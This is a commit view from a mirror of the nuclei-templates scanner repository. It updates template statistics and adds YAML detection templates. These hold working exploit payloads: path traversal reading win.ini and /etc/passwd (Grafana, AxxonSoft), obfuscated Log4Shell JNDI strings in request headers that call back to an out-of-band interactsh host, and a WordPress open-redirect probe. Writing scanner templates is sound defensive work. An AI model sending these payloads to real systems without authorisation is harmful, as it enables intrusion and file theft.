daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'master' into master

patch-1
Evan Rubinstein 2021-12-13 05:07:57 -05:00 committed by GitHub
parent f52b1f0d55 a514552bdf
commit 030cfe89b9
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
11 changed files with 1517 additions and 1103 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

18
README.md
View File

@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 920 | daffainfo | 348 | cves | 926 | info | 912 | http | 2503 | | cve | 921 | daffainfo | 354 | cves | 927 | info | 918 | http | 2512 |
| lfi | 382 | dhiyaneshdk | 341 | vulnerabilities | 350 | high | 695 | file | 57 | | lfi | 382 | dhiyaneshdk | 342 | vulnerabilities | 352 | high | 695 | file | 57 |
| panel | 319 | pikpikcu | 286 | exposed-panels | 319 | medium | 527 | network | 47 | | panel | 321 | pikpikcu | 287 | exposed-panels | 321 | medium | 528 | network | 47 |
| xss | 289 | pdteam | 216 | technologies | 225 | critical | 324 | dns | 12 | | xss | 290 | pdteam | 216 | technologies | 226 | critical | 326 | dns | 12 |
| wordpress | 270 | geeknik | 172 | exposures | 196 | low | 166 | | | | wordpress | 270 | geeknik | 172 | exposures | 196 | low | 166 | | |
| exposure | 250 | dwisiswant0 | 157 | misconfiguration | 164 | | | | | | exposure | 250 | dwisiswant0 | 158 | misconfiguration | 164 | | | | |
| rce | 230 | gy741 | 90 | token-spray | 130 | | | | | | rce | 231 | gy741 | 91 | token-spray | 133 | | | | |
| tech | 228 | pussycat0x | 90 | takeovers | 65 | | | | | | tech | 230 | pussycat0x | 91 | takeovers | 65 | | | | |
| cve2021 | 191 | 0x_akoko | 77 | default-logins | 63 | | | | | | cve2021 | 192 | 0x_akoko | 77 | default-logins | 63 | | | | |
| wp-plugin | 186 | princechaddha | 72 | file | 57 | | | | | | wp-plugin | 186 | princechaddha | 72 | file | 57 | | | | |
**192 directories, 2689 files**. **192 directories, 2700 files**.
</td> </td>
</tr> </tr>

2109
TEMPLATES-STATS.md
View File

File diff suppressed because it is too large Load Diff

2
TOP-10.md
View File

@ -1,5 +1,5 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------
| cve | 921 | daffainfo | 348 | cves | 927 | info | 912 | http | 2504 | | cve | 921 | daffainfo | 348 | cves | 927 | info | 912 | http | 2504 |
| lfi | 382 | dhiyaneshdk | 341 | vulnerabilities | 350 | high | 695 | file | 57 | | lfi | 382 | dhiyaneshdk | 341 | vulnerabilities | 350 | high | 695 | file | 57 |
| panel | 319 | pikpikcu | 286 | exposed-panels | 319 | medium | 527 | network | 47 | | panel | 319 | pikpikcu | 286 | exposed-panels | 319 | medium | 527 | network | 47 |

31
cves/2018/CVE-2018-7467.yaml Normal file
View File

@ -0,0 +1,31 @@
id: CVE-2018-7467
info:
name: AxxonSoft Axxon Next Directory Traversal
author: 0x_Akoko
severity: high
description: AxxonSoft Axxon Next suffers from a directory traversal vulnerability.
reference:
- https://packetstormsecurity.com/files/146604/AxxonSoft-Axxon-Next-Directory-Traversal.html
- https://nvd.nist.gov/vuln/detail/CVE-2018-7467
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2018-7467
cwe-id: CWE-200
tags: cve,cve2018,axxonsoft,lfi
requests:
- raw:
- |+
GET //css//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows\win.ini HTTP/1.1
Host: {{Hostname}}
unsafe: true
matchers:
- type: word
part: body
words:
- "bit app support"
- "fonts"
- "extensions"
condition: and

41
cves/2021/CVE-2021-44228.yaml Normal file
View File

@ -0,0 +1,41 @@
id: CVE-2021-44228
info:
name: Remote code injection in Log4j
author: melbadry9,dhiyaneshDK,daffainfo
severity: critical
description: Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
reference:
- https://github.com/advisories/GHSA-jfh8-c2jp-5v3q
- https://www.lunasec.io/docs/blog/log4j-zero-day/
- https://gist.github.com/bugbountynights/dde69038573db1c12705edb39f9a704a
tags: cve,cve2021,rce,oast,log4j
requests:
- raw:
- |
GET /?x=${jndi:ldap://${hostName}.{{interactsh-url}}/a} HTTP/1.1
Host: {{Hostname}}
User-Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.{{interactsh-url}}}
Referer: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.{{interactsh-url}}}
X-Forwarded-For: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.{{interactsh-url}}}
Authentication: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.{{interactsh-url}}}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
- type: regex
part: interactsh_request
regex:
- '([a-z0-9\.\-]+)\.([a-z0-9]+)\.interactsh\.com'
extractors:
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-z0-9\.\-]+)\.([a-z0-9]+)\.interactsh\.com' # Extract ${hostName}

31
exposed-panels/aerohive-netconfig-ui.yaml Normal file
View File

@ -0,0 +1,31 @@
id: aerohive-netconfig-ui
info:
name: Aerohive NetConfig UI
author: pussycat0x
severity: info
metadata:
shodan-dork: 'http.title:"Aerohive NetConfig UI"'
tags: panel,tech,hiveos,aerohive
requests:
- method: GET
path:
- "{{BaseURL}}/index.php5"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<title>Aerohive NetConfig UI</title>'
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- 'version" align="right" valign="bottom">([0-9.a-z]+)<\/td>'

32
exposed-panels/extreme-netconfig-ui.yaml Normal file
View File

@ -0,0 +1,32 @@
id: extreme-netconfig-ui
info:
name: Extreme NetConfig UI
author: pussycat0x
severity: info
metadata:
shodan-dork: 'http.title:"Extreme NetConfig UI"'
tags: panel,tech,hiveos,extreme
requests:
- method: GET
path:
- "{{BaseURL}}/index.php5"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<title>Extreme NetConfig UI</title>'
condition: and
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- 'version" align="right" valign="bottom">([0-9.a-z]+)<\/td>'

30
exposed-panels/xds-amr-status.yaml Normal file
View File

@ -0,0 +1,30 @@
id: xds-amr-status
info:
name: XDS-AMR - status
author: pussycat0x
severity: info
metadata:
shodan-dork: 'http.title:"XDS-AMR - status"'
tags: panel,tech,xamr,xds
requests:
- method: GET
path:
- "{{BaseURL}}/login.php"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<title>XDS-AMR - Status</title>'
- type: status
status:
- 200
extractors:
- type: regex
part: body
regex:
- 'XAMR\-([0-9]+)'

257
helpers/wordlists/grafana-plugins.txt Normal file
View File

@ -0,0 +1,257 @@
abhisant-druid-datasource
aceiot-svg-panel
ae3e-plotly-panel
agenty-flowcharting-panel
aidanmountford-html-panel
akumuli-datasource
alertlist
alexanderzobnin-zabbix-app
alexandra-trackmap-panel
andig-darksky-datasource
annolist
anodot-datasource
anodot-panel
aquaqanalytics-kdbadaptor-datasource
auxmoney-waterfall-panel
ayoungprogrammer-finance-datasource
barchart
bargauge
belugacdn-app
bessler-pictureit-panel
bilibala-echarts-panel
blackmirror1-singlestat-math-panel
blackmirror1-statusbygroup-panel
bmchelix-ade-datasource
bosun-app
briangann-datatable-panel
briangann-gauge-panel
camptocamp-prometheus-alertmanager-datasource
candlestick
ccin2p3-riemann-datasource
citilogics-geoloop-panel
clarity89-finnhub-datasource
cloudflare-app
cloudspout-button-panel
cloudwatch
cognitedata-datasource
corpglory-progresslist-panel
dalmatinerdb-datasource
dalvany-image-panel
dashlist
ddurieux-glpi-app
devicehive-devicehive-datasource
devopsprodigy-kubegraf-app
digiapulssi-breadcrumb-panel
digiapulssi-organisations-panel
digrich-bubblechart-panel
dlopes7-appdynamics-datasource
doitintl-bigquery-datasource
elasticsearch
factry-untimely-panel
farski-blendstat-panel
fastweb-openfalcon-datasource
fatcloud-windrose-panel
fetzerch-sunandmoon-datasource
fifemon-graphql-datasource
flaminggoat-maptrack3d-panel
flant-statusmap-panel
foursquare-clouderamanager-datasource
frser-sqlite-datasource
fzakaria-simple-annotations-datasource
gapit-htmlgraphics-panel
gauge
geomap
gettingstarted
gnocchixyz-gnocchi-datasource
goshposh-metaqueries-datasource
gowee-traceroutemap-panel
grafadruid-druid-datasource
grafana-athena-datasource
grafana-azure-data-explorer-datasource
grafana-azure-monitor-datasource
grafana-clickhouse-datasource
grafana-clock-panel
grafana-datadog-datasource
grafana-discourse-datasource
grafana-dynatrace-datasource
grafana-enterprise-logs-app
grafana-enterprise-traces-app
grafana-es-open-distro-datasource
grafana-github-datasource
grafana-gitlab-datasource
grafana-googlesheets-datasource
grafana-guidedtour-panel
grafana-honeycomb-datasource
grafana-image-renderer
grafana-iot-sitewise-datasource
grafana-iot-twinmaker-app
grafana-jira-datasource
grafana-k6cloud-datasource
grafana-kairosdb-datasource
grafana-metrics-enterprise-app
grafana-mongodb-datasource
grafana-newrelic-datasource
grafana-opcua-datasource
grafana-opensearch-datasource
grafana-oracle-datasource
grafana-piechart-panel
grafana-polystat-panel
grafana-redshift-datasource
grafana-salesforce-datasource
grafana-saphana-datasource
grafana-sentry-datasource
grafana-servicenow-datasource
grafana-simple-json-datasource
grafana-singlestat-panel
grafana-snowflake-datasource
grafana-splunk-datasource
grafana-splunk-monitoring-datasource
grafana-strava-datasource
grafana-synthetic-monitoring-app
grafana-timestream-datasource
grafana-wavefront-datasource
grafana-worldmap-panel
grafana-x-ray-datasource
graph
graphite
gretamosa-topology-panel
gridprotectionalliance-openhistorian-datasource
gridprotectionalliance-osisoftpi-datasource
groonga-datasource
hadesarchitect-cassandra-datasource
hawkular-datasource
heatmap
histogram
humio-datasource
ibm-apm-datasource
influxdb
innius-grpc-datasource
innius-video-panel
instana-datasource
integrationmatters-comparison-panel
isaozler-paretochart-panel
itrs-hub-datasource
jaeger
jasonlashua-prtg-datasource
jdbranham-diagram-panel
jeanbaptistewatenberg-percent-panel
larona-epict-panel
lightstep-metrics-datasource
linksmart-hds-datasource
linksmart-sensorthings-datasource
logs
loki
macropower-analytics-panel
magnesium-wordcloud-panel
marcuscalidus-svg-panel
marcusolsson-calendar-panel
marcusolsson-csv-datasource
marcusolsson-dynamictext-panel
marcusolsson-gantt-panel
marcusolsson-hexmap-panel
marcusolsson-hourly-heatmap-panel
marcusolsson-json-datasource
marcusolsson-static-datasource
marcusolsson-treemap-panel
meteostat-meteostat-datasource
michaeldmoore-annunciator-panel
michaeldmoore-multistat-panel
michaeldmoore-scatter-panel
monasca-datasource
monitoringartist-monitoringart-datasource
moogsoft-aiops-app
mssql
mtanda-google-calendar-datasource
mtanda-heatmap-epoch-panel
mtanda-histogram-panel
mxswat-separator-panel
mysql
natel-discrete-panel
natel-influx-admin-panel
natel-plotly-panel
natel-usgs-datasource
neocat-cal-heatmap-panel
netsage-sankey-panel
news
nodeGraph
novalabs-annotations-panel
novatec-sdg-panel
ntop-ntopng-datasource
oci-logs-datasource
oci-metrics-datasource
opennms-helm-app
opentsdb
ovh-warp10-datasource
paytm-kapacitor-datasource
percona-percona-app
petrslavotinek-carpetplot-panel
piechart
pierosavi-imageit-panel
pixie-pixie-datasource
pluginlist
postgres
pr0ps-trackmap-panel
praj-ams-datasource
prometheus
pue-solr-datasource
pyroscope-datasource
pyroscope-panel
quasardb-datasource
rackerlabs-blueflood-datasource
radensolutions-netxms-datasource
redis-app
redis-datasource
redis-explorer-app
ryantxu-ajax-panel
ryantxu-annolist-panel
satellogic-3d-globe-panel
savantly-heatmap-panel
sbueringer-consul-datasource
scadavis-synoptic-panel
sebastiangunreben-cdf-panel
sidewinder-datasource
simpod-json-datasource
singlestat
skydive-datasource
smartmakers-trafficlight-panel
sni-pnp-datasource
sni-thruk-datasource
snuids-radar-panel
snuids-svg-panel
snuids-trafficlights-panel
speakyourcode-button-panel
spotify-heroic-datasource
sskgo-perfcurve-panel
stackdriver
stagemonitor-elasticsearch-app
stat
state-timeline
status-histor
streamr-datasource
table
table-old
teamviewer-datasource
tempo
tencentcloud-monitor-app
testdata
text
thalysantana-appcenter-datasource
thiagoarrais-matomotracking-panel
timeseries
udoprog-heroic-datasource
vertamedia-clickhouse-datasource
vertica-grafana-datasource
verticle-flowhook-datasource
volkovlabs-image-panel
vonage-status-panel
voxter-app
welcome
williamvenner-timepickerbuttons-panel
woutervh-mapbox-panel
xginn8-pagerduty-datasource
yesoreyeram-boomtable-panel
yesoreyeram-boomtheme-panel
yesoreyeram-infinity-datasource
yeya24-chaosmesh-datasource
zipkin
zuburqan-parity-report-panel

47
vulnerabilities/grafana/grafana-file-read.yaml
View File

@ -2,7 +2,7 @@ id: grafana-file-read
info: info:
name: Grafana v8.x Arbitrary File Read name: Grafana v8.x Arbitrary File Read
author: z0ne,dhiyaneshDk,jeya.seelan author: z0ne,dhiyaneshDk,jeya.seelan,dwisiswant0
severity: high severity: high
reference: reference:
- https://nosec.org/home/detail/4914.html - https://nosec.org/home/detail/4914.html
@ -14,51 +14,12 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/public/plugins/{{plugin-id}}/../../../../../../../../../../../../../../../../../../../etc/passwd" - "{{BaseURL}}/public/plugins/{{pluginSlug}}/../../../../../../../../../../../../../../../../../../../etc/passwd"
payloads: payloads:
plugin-id: pluginSlug: helpers/wordlists/grafana-plugins.txt
- alertlist
- annolist
- barchart
- bargauge
- candlestick
- cloudwatch
- dashlist
- elasticsearch
- gauge
- geomap
- gettingstarted
- grafana-azure-monitor-datasource
- graph
- heatmap
- histogram
- influxdb
- jaeger
- logs
- loki
- mssql
- mysql
- news
- nodeGraph
- opentsdb
- piechart
- pluginlist
- postgres
- prometheus
- stackdriver
- stat
- state-timeline
- status-history
- table
- table-old
- tempo
- testdata
- text
- timeseries
- welcome
- zipkin
threads: 50
stop-at-first-match: true stop-at-first-match: true
matchers-condition: and matchers-condition: and
matchers: matchers:

22
vulnerabilities/wordpress/pieregister-open-redirect.yaml Normal file
View File

@ -0,0 +1,22 @@
id: pieregister-open-redirect
info:
name: Pie Register < 3.7.2.4 - Open Redirect
severity: low
author: 0x_Akoko
description: The plugin passes unvalidated user input to the wp_redirect() function, without validating it, leading to an Open redirect issue.
reference:
- https://wpscan.com/vulnerability/f6efa32f-51df-44b4-bbba-e67ed5785dd4
- https://wordpress.org/plugins/pie-register/
tags: wordpress,redirect,wp-plugin,pieregister
requests:
- method: GET
path:
- "{{BaseURL}}/?piereg_logout_url=true&redirect_to=https://example.com"
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'